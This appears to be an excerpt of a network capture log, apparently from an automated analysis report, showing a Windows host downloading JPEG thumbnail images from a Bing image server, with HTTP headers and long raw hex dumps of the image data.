                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 17 66 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 32 3a 32 39 20 31 35 3a 31 36 3a 34 33 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                                                                                  Data Ascii: JFIF``fExifMM*bj(1r2i``Adobe Photoshop 25.2 (Windows)2023:12:29 15:16:438
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: 47 b6 97 15 2a a5 3b 65 2e 64 3e 56 41 8a 76 2a 5c 6d a6 ed f6 a5 cc 1c ac 63 0a 76 29 d8 a3 14 ee 16 1b 8a 6a 8a 93 14 62 8b 8a c2 6d f6 a3 6d 3d 45 3d 45 4d ca b0 cd 94 6c a9 69 71 45 c7 62 15 14 b5 2e 29 76 52 b8 ec 47 b7 da 9b d6 a6 64 a4 61 40 72 91 52 ad 2b 0a 36 fb 50 20 6f 9a 8a 36 fb 51 40 0d 61 45 3a 93 14 00 66 92 8a 28 00 a7 53 69 56 80 1f 8d d4 e8 c5 11 9a 46 34 8a 5a 6a 3f 77 bd 37 ef 7d ea 45 34 b4 00 74 a3 9a 39 a1 45 30 24 8e 9d cd 31 69 6a 4a 1a d4 8d 4b 49 8a 68 91 ab 4b 45 14 c0 28 a2 8a 00 29 71 4b 8f ee d2 35 20 13 9a 4c 6e a7 ad 3d 45 17 02 1c 50 df 2d 4d e5 ed a4 64 55 a5 71 f2 b4 47 d6 8d 9b a9 f8 a3 14 ee 16 23 c5 18 a9 69 31 40 58 8f 14 aa 2a 56 4a 6e 28 b8 58 55 14 bb 37 52 f3 4e dd b6 91 61 b7 6d 35 8d 1b e9 19 f7 52 41 cc 83
                                                                                                                                                                                                                                                                  Data Ascii: G*;e.d>VAv*\mcv)jbmm=E=EMliqEb.)vRGda@rR+6P o6Q@aE:f(SiVF4Zj?w7}E4t9E0$1ijJKIhKE()qK5 Ln=EP-MdUqG#i1@X*VJn(XU7RNam5RA
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: 86 96 39 ca 2a 96 1e 3f 0e ef 64 9f 95 f5 fc 8f 02 a6 5f 25 27 57 13 2b 73 6c 9b bb 7f 81 cc d9 dd d9 e8 da 1f d9 f4 58 11 d9 51 60 fb ff 00 ea 57 be 3d eb a6 f0 ee bf 6c b6 30 c3 6f e6 6d f9 59 fe 4f de bf e1 8e d5 6b c1 fe 0f 9d ec 66 bc b5 9e 4b 7b 55 85 9a 1b 8b bf 2e 7d 8d fd d3 1b 0e 95 b1 a3 de f8 f6 de 7f b6 5b df e9 b7 92 7d 91 bc 9d 9a 74 71 6c c7 cd 91 8c 6d ae 69 63 b0 cf 9e 31 71 6d 6f 77 6d 7d 6c ce ba 78 3c 44 79 64 ee 93 d9 28 df 4f bc c5 d7 85 e5 ae 94 9a d5 9f fa 3a d9 a4 92 cd bd f6 b4 d1 96 1d 00 c1 fe f7 4a d0 ff 00 84 86 7f 14 78 0e 1b 8d 37 45 8e 5b 86 7f b8 90 6e 96 15 1f c1 cf 3c fa 9f a9 ac 9d 6a 6b ed 67 54 87 54 d5 2e e7 b8 9a 5d ab be 57 5f 29 3e 5d c7 9e 78 fe b5 ed df b1 1f 87 16 f3 c5 57 da 85 e7 86 a7 d5 34 fd 9b 6d 35 67
                                                                                                                                                                                                                                                                  Data Ascii: 9*?d_%'W+slXQ`W=l0omYOkfK{U.}[}tqlmic1qmowm}lx<Dyd(O:Jx7E[n<jkgTT.]W_)>]xW4m5g
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: bb 9e 9f f7 cd 5b d0 74 2f 11 db dd 5d fd 8f 5d 91 76 ee fd cc c8 d3 c0 f9 c9 ca 74 35 e5 4f 8a dd 34 fd bd a2 fb 2d 4f 72 3c 13 4e a5 9d 17 29 ae fb 1e ef a2 fc 5b f0 06 a3 bd 61 d5 a4 69 15 f6 a4 49 03 79 b3 37 60 ab c1 fe 9e f5 9d e3 2f 88 1a ad ff 00 fc 4a 7c 2f 61 25 9c 72 bb 79 da a3 ba ee 86 31 d1 87 f7 58 fe 62 be 4b bc d2 bc 47 a4 7c 4d 48 db 4d 8d be d1 73 6c d3 7d 92 06 6d 8b 1b 03 2b 6f fe 0f ef 11 5f 46 eb 91 fd 9f 47 b4 d2 61 d4 a7 b3 86 28 56 5b 89 91 17 cf 9a 31 86 6d bf dc ce ee b5 e4 e7 1c 51 88 a7 1a 70 a5 35 69 a7 af fc 35 fb 9e be 47 c1 f8 29 d4 a9 3a d4 dd e0 d6 8d ef af 9d 8c dd 5b 4e 9e ca 05 d4 bc 41 77 3d fc 3f 79 1d e7 6f 3d e4 dd de b8 1b 34 8b e2 0e b1 71 a7 cd e6 5a e9 ba 6d c2 b5 c2 5b bf ca 9d f6 86 ff 00 9e 9d bf d9 eb 52
                                                                                                                                                                                                                                                                  Data Ascii: [t/]]vt5O4-Or<N)[aiIy7`/J|/a%ry1XbKG|MHMsl}m+o_FGa(V[1mQp5i5G):[NAw=?yo=4qZm[R
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: 7e 0f f1 06 82 f7 d7 16 b6 ff 00 da 52 cd 75 70 b2 6f b8 49 17 7f cd 9f e2 5a f4 ed 4b 54 88 f8 7d 2d d6 39 16 37 46 d8 93 27 f3 cf e7 5c 95 7d a5 1a bc 8d 34 9f 72 e9 fb 3a b1 72 56 f9 1c af 89 3f b4 fc 43 63 f6 18 74 d9 19 6f 13 e4 f3 76 c5 ff 00 ec fc bd 33 dd aa ff 00 87 6f 60 b4 48 b4 bd 2d 27 b5 b5 b5 f2 d7 63 a6 d5 85 42 ed db f8 7c b5 a7 08 fb 54 9f 6a 69 e4 db 6b 0a fd 9d 3e ee f5 2b bb 75 71 3e 24 bc be d2 7e d0 b6 70 47 7f fe 91 e6 cc 8f fe b5 33 f7 d7 eb 5d 31 bd 45 ca 9a fc 91 93 a8 a9 be 67 77 a1 d5 c9 aa 5b 5a 7d a2 f2 de 79 3f d3 2e 16 da de e1 d3 e6 dd f7 15 7f 17 6e b5 9d f1 62 58 bc 03 7d 6f 75 67 7c 93 df 6a 8f 1c 09 63 33 aa c6 ec b9 fd e3 37 de 55 51 bb f1 aa de 0b f1 4e 9b e2 9d 0d af 1a 78 13 fb 11 fe 7d 2f c8 fd ec 32 1f ba 5f 76
                                                                                                                                                                                                                                                                  Data Ascii: ~RupoIZKT}-97F'\}4r:rV?Cctov3o`H-'cB|Tjik>+uq>$~pG3]1Egw[Z}y?.nbX}oug|jc37UQNx}/2_v
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: b0 f5 a8 e3 30 fe d2 9c 75 ea b4 f9 9f 1f 5e 95 6c 2d 7f 67 51 e9 d1 f9 74 2e 78 a0 ff 00 6b 6a 9f 68 b1 8e 08 b7 23 6c 8b cf f9 9f 1d 49 dd 51 f8 5f 54 bb b3 be 48 e3 d4 a4 b0 91 9f ca 99 ff 00 d9 fa 74 e2 9d e2 68 ad 7c 8b 8b ad 26 39 2f e3 5d b2 24 af f2 c9 b7 f8 83 a8 ac 99 9f cf fd f4 31 c7 14 9b 37 4a 8f bb e4 fc eb d1 a3 4e 13 a0 a9 b5 a6 da ee 8e 0a b5 25 1a ae 6b 7d fc 99 e9 16 fa 4e 8c d2 35 ab 49 75 2b 6a 57 1f 6c fb 44 bb 97 ce 57 e1 80 c6 3e 56 ae ee 3f 0c 68 d1 68 fa 7c 36 76 09 f6 35 7f b3 3e f9 fe e2 ff 00 0f e4 76 e2 bc 23 49 d5 6e ac e4 4b 79 bf 7a bb d5 a1 9b 7f dc 60 bc 2e 7f bb 5e c7 f0 77 53 8b 5f d0 db 4d d4 a4 db 36 cd df dd f9 b7 7c a5 7f a5 7c 9e 75 84 c4 e1 e0 aa 73 b7 14 ff 00 a6 7d 36 57 8a c3 e2 1b 87 22 52 b7 6f c0 df d3 ef
                                                                                                                                                                                                                                                                  Data Ascii: 0u^l-gQt.xkjh#lIQ_THth|&9/]$17JN%k}N5Iu+jWlDW>V?hh|6v5>v#InKyz`.^wS_M6||us}6W"Ro
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: f1 61 4f 7f ef 62 b1 ad fe 2e 5e 7d 97 c9 ba b4 7f 31 77 34 49 14 df 2b e7 9e 5f f9 57 1f e3 6f 11 5e 6a d7 c9 7d 71 67 3a 5c 5a be e8 bf d8 5f a2 8a e4 96 1b 15 8d 6a 9e 2e 8c 57 9a b5 ff 00 af c8 e9 8d 6c 26 16 2e 58 5a b2 7e 4f 6b 7e 3f f0 4f 5b d4 b5 9d 5e f2 fb ec b6 7e 13 45 86 d6 25 9d 2e 2d ef 76 c6 99 fb bb 53 f8 9b 76 fa d9 f0 3e a3 aa fd 85 34 bf b2 4f 2a ad da cf 71 69 72 fb 7e 63 ff 00 3c 9b a1 f9 79 2a 6b e7 a8 bc 51 79 0d c6 e9 ae e7 89 65 75 69 76 6e ed d3 6f a7 5a ed e1 f1 ab 35 a4 5e 5e ad 1b 6d db 22 7d ad 1b e4 ff 00 81 ad 72 62 b2 5a b4 e0 a3 4d 2b 3f 5f c7 57 fa 1d 58 6c da 94 e6 dc a4 ee bf c3 fe 4b f5 3b cf 03 f8 83 c3 96 fe 3c d7 b5 0d ff 00 60 b5 d5 2e 2d 59 22 77 55 6f 91 9c cb ed 5d e6 a3 e3 2d 2a f3 c5 56 3a d5 9d dc 17 50 ac
                                                                                                                                                                                                                                                                  Data Ascii: aOb.^}1w4I+_Wo^j}qg:\Z_j.Wl&.XZ~Ok~?O[^~E%.-vSv>4O*qir~c<y*kQyeuivnoZ5^^m"}rbZM+?_WXlK;<`.-Y"wUo]-*V:P
                                                                                                                                                                                                                                                                  2024-12-19 12:44:17 UTC16067INData Raw: b7 fc b3 ad 79 a2 4f 29 55 b5 79 da 89 35 db 96 8f cb a9 da da db fe 59 c1 48 da 74 4b ff 00 2c e4 56 a3 9a 23 e4 33 e6 bc b9 9f e6 f3 2a 09 1d bf 8a 4a b3 79 6c d1 fd d9 2a 8c 96 12 b3 ee f3 2a f9 d1 2e 98 e9 12 2f bc d2 7c d5 0f 97 13 54 8b a5 dd 56 96 9b a5 cb f7 99 37 52 75 12 1f 23 32 d6 08 bf e7 9d 58 86 cb 77 cd e5 fc b5 bb 1e 9d 2f f0 c1 26 df f7 29 24 b6 95 7e 5f bb 51 ed 6e 57 29 8f 25 92 b4 7b 56 aa 49 a7 37 99 fb cf 96 ba 58 f4 f9 62 8f cc a8 ee ad 1a 59 3e 68 e9 2a 81 c9 73 15 74 f8 97 fe 5a 7c d4 7d 8d 57 e5 f3 2b 49 74 b9 e5 ff 00 53 1c 95 1c 3a 1e a0 f2 6d f2 f6 d3 f6 8b b8 7b 33 3d 6d 97 fe 7b d5 db 38 e2 5f bd 26 ea 7c de 14 d4 be f7 97 25 3a df c3 5a 82 c8 9f bb f9 a8 f6 91 ee 27 4f c8 d3 d3 63 b1 9e 4f 2e 4f 97 75 68 ae 99 a6 26 ff 00
                                                                                                                                                                                                                                                                  Data Ascii: yO)Uy5YHtK,V#3*Jyl**./|TV7Ru#2Xw/&)$~_QnW)%{VI7XbY>h*stZ|}W+ItS:m{3=m{8_&|%:Z'OcO.Ouh&
                                                                                                                                                                                                                                                                  2024-12-19 12:44:17 UTC16384INData Raw: 34 96 fa 6d 8c 4d fc 7f 26 da 58 e2 8a 6f 9a 1d 36 d5 bf db 4f bd 5d 25 8f 86 e5 9e 3f 33 cf f9 7f db a4 ba f0 ff 00 95 22 2f 9f 1b 37 fb 69 4f db 46 f6 0f 63 2b 5c e3 ef ac a2 b8 fd dc da 6e ef f8 1d 40 be 16 8a 79 37 47 a6 c6 df ec 57 79 36 91 3c 5b 37 47 6a cd fe e5 2c 86 e6 ca 3f de 47 06 df f6 2a e3 5b a2 33 74 6d b9 e7 5a a7 81 25 9f e5 5d 36 45 ff 00 73 6d 50 8f c0 5b 7f d7 69 37 4c bf ec 57 ad e9 f7 2d 71 07 98 be 5b 55 85 76 fe 2a af ac 4d 69 72 7d 84 1e a7 8a dd 78 1e 25 ff 00 97 0b e4 5f f6 d2 8b 7f 01 c0 df eb 2d 2f bf e0 10 57 b4 33 d2 33 d5 7d 6a 62 fa bc 0f 1e 93 c0 da 1a ff 00 cb a6 a4 bf ef c1 51 37 80 f4 a3 f7 60 ba ff 00 be 19 6b d8 d9 e9 ac 56 8f ac cf b8 9e 1e 07 8d c9 f0 fb 4a 6f bb 1c eb ff 00 7d 55 69 be 1d 22 c9 fb 99 23 65 ff 00
                                                                                                                                                                                                                                                                  Data Ascii: 4mM&Xo6O]%?3"/7iOFc+\n@y7GWy6<[7Gj,?G*[3tmZ%]6EsmP[i7LW-q[Uv*Mir}x%_-/W33}jbQ7`kVJo}Ui"#e
                                                                                                                                                                                                                                                                  2024-12-19 12:44:17 UTC16384INData Raw: da ad f9 9e d5 83 e0 fd 7f 4c d5 ed 5e f2 19 e4 5b 85 7d b3 5a 3f fa d8 7d b6 1f e7 5a 7e 32 d3 ff 00 b5 3c 32 f7 cd e6 2c d1 23 79 5f 3d 65 4f 15 cb 37 19 2e 49 df a6 96 2e 54 a2 e1 74 f9 a3 e7 b1 2f 86 f5 4f 10 da e9 bb b4 1f 12 6a 5a 74 91 7d c4 b7 ba dd 17 e2 ad 9a e8 7c 1b f1 ff 00 c5 f6 b3 c3 6f e2 2b 0d 36 e1 52 66 59 92 64 68 27 7c 7f 75 87 c9 fa 57 9c f8 3e 3f 10 e9 7b 26 ba b0 8d 96 e1 37 7d 9d 37 6e 4a ea 6e 34 b6 d6 b4 d9 96 69 3e c7 71 b3 cc 79 b6 6e 5f 6a f5 f0 dc 4d 98 d0 a8 a9 29 f3 25 f3 fc cf 23 13 c3 99 66 2a 1c f2 a6 93 fb bf 23 d9 fc 33 f1 df c0 fa 94 ff 00 67 be 92 ef 49 9b ee ff 00 a4 26 e8 bf ef b4 cf eb 5e 91 a6 de 59 ea 36 30 de 58 cf 05 d5 bc a9 b9 26 85 f7 2b fe 35 f1 d5 f7 87 19 60 99 be c9 07 98 df f3 c5 da 2d eb fd ef 73 f5
                                                                                                                                                                                                                                                                  Data Ascii: L^[}Z?}Z~2<2,#y_=eO7.I.Tt/OjZt}|o+6RfYdh'|uW>?{&7}7nJn4i>qyn_jM)%#f*#3gI&^Y60X&+5`-s


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  4192.168.2.649728150.171.27.10443
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC375OUTGET /th?id=OADD2.10239340418578_1AMTWIX1RFG5EZ1V6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                  Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC855INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                  Content-Length: 1061732
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                  NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                  X-MSEdge-Ref: Ref A: BA9C9F432E4D46EDAB398C710BBCF809 Ref B: EWR30EDGE1007 Ref C: 2024-12-19T12:44:16Z
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:15 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC15529INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 04 04 04 04 05 09 06 05 05 05 05 0b 08 08 06 09 0d 0b 0d 0d 0d 0b 0c 0c 0e 10 14 11 0e 0f 13 0f 0c 0c 12 18 12 13 15 16 17 17 17 0e 11 19 1b 19 16 1a 14 16 17 16 ff db 00 43 01 04 04 04 05 05 05 0a 06 06 0a 16 0f 0c 0f 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                                                                                                                                                  Data Ascii: JFIFCC8"}!1AQa"q2
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: d6 ad 9f 8b fc 53 a7 6c 6b 5f 10 5f c6 f1 f0 91 2b 70 4f a6 d2 3f 5a a1 e2 0f 07 5b e8 d7 7e 5b f8 8a de ea 16 84 4f 6f 7b 6d 11 78 dc 67 04 36 0e e8 f0 7d 46 39 a9 ec fc 23 e3 a5 f0 ff 00 fc 24 b6 de 1a d4 6f 74 64 24 7d be 0b 66 92 32 07 52 08 19 2a 3f bc 38 06 ba 2a 3c 1d 48 29 49 a6 9f f3 69 76 fa 6a b7 f2 dc 39 79 d1 bc 7c 77 af dc d9 34 d7 d7 f6 6b b1 d2 39 92 39 12 3b 99 43 75 2a a7 ef 63 f0 c6 6a 7d 51 6c 34 8f 09 dd 5c 69 be 20 d4 ed f5 7b e9 52 28 34 79 74 ef 2d 5e 07 39 2d 24 db 8f 3d 4a ed c8 3f 8d 79 f5 85 be 85 7d 74 df da 17 93 d9 6e 38 f3 3c 9f 39 53 d7 2b 90 72 3d 2b d8 b5 38 bf 67 db 8d 73 c2 9a 3f 86 35 7f 12 1b 5d 3a c6 69 b5 bb fb d0 d1 fd be 65 c1 8a 25 42 4f 95 b8 e4 33 2f 45 03 1c f3 5c 38 aa 14 70 ce 2a 10 95 b5 6d 46 17 5a 2b d9
                                                                                                                                                                                                                                                                  Data Ascii: Slk__+pO?Z[~[Oo{mxg6}F9#$otd$}f2R*?8*<H)Iivj9y|w4k99;Cu*cj}Ql4\i {R(4yt-^9-$=J?y}tn8<9S+r=+8gs?5]:ie%BO3/E\8p*mFZ+
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: 85 19 37 2e f9 64 e3 71 c8 ca 8e 40 eb 53 f8 4f c1 d7 1e 24 d1 e7 b5 1a 1e a5 77 71 6f f2 a6 b0 b7 4d 22 80 bc ff 00 a9 93 1d 40 e8 39 e9 57 34 91 ad c1 3d f6 af ae d8 2a e9 b7 72 4b 3c ba 89 88 a3 09 09 dd f2 f0 19 dc e4 0f 40 29 fe 13 f1 1e 9c 75 cb 7b 7d 4f 55 d4 6c 74 7d 42 e0 0b d8 6d 19 b7 ba f4 5f bb ce 4e 47 1d f3 5a ce be 2b d8 b5 07 cd 28 d9 b6 ba be ba 46 da f4 e5 7e 57 bd ee 12 e7 5a 24 61 43 a0 dd 08 44 48 97 16 b1 c2 f9 38 8b cb 69 c8 f7 3c e3 af a5 32 eb ed fa 76 a1 1c 91 23 c6 7c c1 21 8e 2f 9e 42 07 56 3e d8 cf 27 8a eb be 29 49 a8 49 e3 4f ec 8d 1a c1 f4 9b 6d 0e 12 91 35 e4 40 34 d3 1f bd 24 8a ac 77 6d 1e a4 e3 1d 32 71 58 da 3e a5 2d de b1 67 a1 d9 69 33 35 8c 8c 1f 51 b8 cf ef b5 0c f5 90 b9 fb 88 3a 85 ee 6a a9 62 2a d4 a4 aa b4 9a
                                                                                                                                                                                                                                                                  Data Ascii: 7.dq@SO$wqoM"@9W4=*rK<@)u{}OUlt}Bm_NGZ+(F~WZ$aCDH8i<2v#|!/BV>')IIOm5@4$wm2qX>-gi35Q:jb*
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: 67 d0 fe 55 83 e2 9d 63 4c 4d 59 2e f5 31 6b ab cf 6b 6d 19 9d e0 2e b2 89 07 de 91 51 57 6c 64 74 19 07 39 cd 5f f1 9f 8b 35 29 fc 1d 6b a5 78 3b 41 96 d7 4b b6 50 ac 6e 14 f9 ee 83 e6 f3 19 57 2e 17 71 62 49 fb df cb d1 ab 87 a9 35 15 4a 36 e6 7b b7 a2 4b b5 fe 5d 3e e3 35 06 b5 1d 0f 8e f4 ad 16 ea 09 3c 54 6f 9a dd b0 d0 c1 6d a9 79 2b 21 00 8c c8 c8 a7 72 e7 19 57 da 07 15 8f e2 cf 13 d8 ea 5a 0d ad e5 a6 8b 24 d7 17 db 7c 9b bf 27 ec d6 c8 84 f2 64 99 80 0c 47 20 94 05 70 38 26 b9 bd 53 4e 3a 9d d4 37 c6 d2 db 50 49 19 3c c7 b9 22 38 a4 7e b8 11 0c 65 73 d3 77 cc 47 51 ce 2b 33 c4 d7 5a 9d ad d5 c3 eb 2f 77 24 d3 2a 4f ba 42 64 05 01 2b b9 88 c8 8d 57 18 03 8e bd 2b d3 c3 e5 98 6e 78 ca 3f 1f 55 7d 3d 12 df d7 6f f2 d1 da 69 2b 6a 7a df 88 3c 37 17
                                                                                                                                                                                                                                                                  Data Ascii: gUcLMY.1kkm.QWldt9_5)kx;AKPnW.qbI5J6{K]>5<Tomy+!rWZ$|'dG p8&SN:7PI<"8~eswGQ+3Z/w$*OBd+W+nx?U}=oi+jz<7
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: 79 83 7e f1 46 ee 87 24 e7 ea 2b 9a d4 fc 5d 65 3f 8e 85 ce bd 71 74 6f 85 d2 1d 42 ff 00 4e 09 23 3a af 0d b9 1b 08 d8 c0 c2 8c 00 6b d2 a1 94 d6 ad 08 ca a2 f7 ad d1 2e 8f 77 d1 df af cb cc f3 67 2f 7d f2 af b8 fa 32 3f 10 f8 f7 46 b6 56 d4 74 dd 3f 59 b7 d3 d4 a2 34 12 f9 61 e3 65 0a b2 06 cf cb 8c fd ec 73 91 d3 14 cd 77 fb 5b 52 f0 f2 ea 1a 6e 88 21 b8 9b 77 d8 b4 ab e8 f7 c6 d3 28 1b 8c 93 ab 2e 10 64 15 ea ac 7e b5 e2 fa 5f 8e bc 3f a3 68 f0 f8 9b c4 37 57 5a 87 8b b5 09 a4 36 96 6d 18 fb 3c 76 05 4a c5 3d c0 19 59 24 6c 1c 21 da 40 41 c0 e0 9b fa 9f c6 0b 7f 13 f8 56 3d 12 6b eb 9b c9 2d 66 8e e6 68 ae 6d 59 42 6d 6f bd 04 b1 6e 64 23 23 86 c1 c6 e1 dc 0a c6 79 1e 27 9f 99 53 4d 27 ab b6 ff 00 2b ea 97 7d 3e e0 f6 91 4a d2 5f 75 ec 64 78 e3 c6 9a
                                                                                                                                                                                                                                                                  Data Ascii: y~F$+]e?qtoBN#:k.wg/}2?FVt?Y4aesw[Rn!w(.d~_?h7WZ6m<vJ=Y$l!@AV=k-fhmYBmond##y'SM'+}>J_udx
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: b3 80 2d d0 00 33 bf 6a 81 df 35 e3 3f f0 ad be 2c e8 7e 17 b8 d6 bc 39 a7 6a 6d a3 6a 16 12 38 f1 15 b3 8b 7b 59 ad 77 15 99 30 4e 76 92 02 80 79 61 ca 8c 35 64 e9 3e 2a f8 d3 e2 d8 ad f5 8d 26 eb c7 9e 24 d3 ec af 16 16 f2 c4 f7 d0 0b 92 03 22 bc 64 3a b3 f2 0a 87 52 0f 07 15 ef df b3 9d c7 ed 09 79 ab 5f 6b 5a de 89 e2 4b 2b 59 2e 12 29 67 9e 46 b7 2c 57 83 0c 16 73 29 44 66 38 cb 05 ce ee 32 06 6b e9 65 87 a7 94 e0 a5 25 57 9a d6 b7 3e 8b f1 94 9d fe 7a f6 1d 18 61 2a 26 aa c2 cf cb 6b 7f c3 f9 33 e7 5f 84 fe 12 d5 b5 0f 8a fa 47 87 f5 5d 13 53 d3 d4 5e a3 5e ac d6 92 c6 d1 44 06 7e 63 b0 90 a4 63 b7 39 eb 5e ed 27 c3 0d 57 43 f1 c3 e8 16 d6 3a 94 7a 1e a5 21 79 35 4b 2b b3 1c 50 36 c6 22 2b 84 5f f5 83 24 05 3b 47 7c f4 af 70 d3 3c 47 e2 f8 b4 fd 33
                                                                                                                                                                                                                                                                  Data Ascii: -3j5?,~9jmj8{Yw0Nvya5d>*&$"d:Ry_kZK+Y.)gF,Ws)Df82ke%W>za*&k3_G]S^^D~cc9^'WC:z!y5K+P6"+_$;G|p<G3
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: 1f 8a af b4 fb e5 b1 92 ee 6b 2d 11 5a c6 ea ed dd 9b 75 8a 3a 83 e5 84 60 0e fc ed 28 f9 cf 18 ae 6e 3f 81 ff 00 0e f5 4f 84 3a 90 8f c7 fe 1f d5 35 96 58 5d f5 0b d7 3e 7c 53 b2 6f 98 b3 b9 0d 22 2b e1 37 47 b8 15 cf 73 5f 4d 8d cb 70 b5 e1 cb 8e 8c a5 2d 2f c8 a3 f0 db 56 ae a5 7b 7f 76 2b b2 bb 34 ad 28 34 a5 16 be 7f f0 ff 00 a9 bd af 78 a9 be 22 e8 d1 78 37 e1 72 ea 1a 56 9b 24 0d 16 a5 e2 fb 83 34 70 c7 6c 78 78 6c d4 e1 e7 76 19 5d f8 1f 29 3e b9 ad 6d 07 e1 4e 93 e1 ff 00 86 5a 77 86 ec 34 bf 0e ea fa 6c 46 56 b9 4d 47 4f 91 2e e7 2d c7 9c 8c 32 4b e3 82 4a 81 80 30 05 71 be 20 f8 b7 a9 69 da 46 97 62 b1 dd 5b b3 5b aa c7 0d dd 81 b5 7b 46 18 49 23 88 f1 be 2c 05 29 20 03 2a c3 3c e6 ba 6d 73 c7 1e 1e d4 21 d2 5a d3 e2 26 8b 63 7b 1b 61 13 50 96
                                                                                                                                                                                                                                                                  Data Ascii: k-Zu:`(n?O:5X]>|So"+7Gs_Mp-/V{v+4(4x"x7rV$4plxxlv])>mNZw4lFVMGO.-2KJ0q iFb[[{FI#,) *<ms!Z&c{aP
